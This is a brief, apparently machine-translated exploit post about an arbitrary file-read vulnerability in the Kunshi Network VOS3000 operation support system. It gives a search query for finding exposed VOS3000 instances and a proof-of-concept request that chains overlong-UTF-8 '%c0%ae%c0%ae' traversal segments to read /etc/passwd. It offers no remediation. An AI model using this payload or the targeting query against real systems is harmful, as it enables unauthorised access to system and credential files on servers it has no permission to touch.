Post

Kunshi Network Vos3000 Virtual Operation Support System Arbitrary File Reading Vulnerability

Kunshi Network Vos3000 Virtual Operation Support System Arbitrary File Reading Vulnerability

Kunshi Network VOS3000 Virtual Operation Support System %c0%ae%c0%ae Any file reading vulnerability

Vulnerability Description

Kunshi Network VOS3000 virtual operation support system bypassing detection through characters such as %c0%ae%c0%ae, which can lead to any file reading vulnerability.

Vulnerability Impact

Kunshi Network VOS3000 virtual operation support system

Network surveying and mapping

app=”VOS-VOS3000”

Vulnerability reappears

Login page

img

Verify POC

1
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

img

This post is licensed under CC BY 4.0 by the author.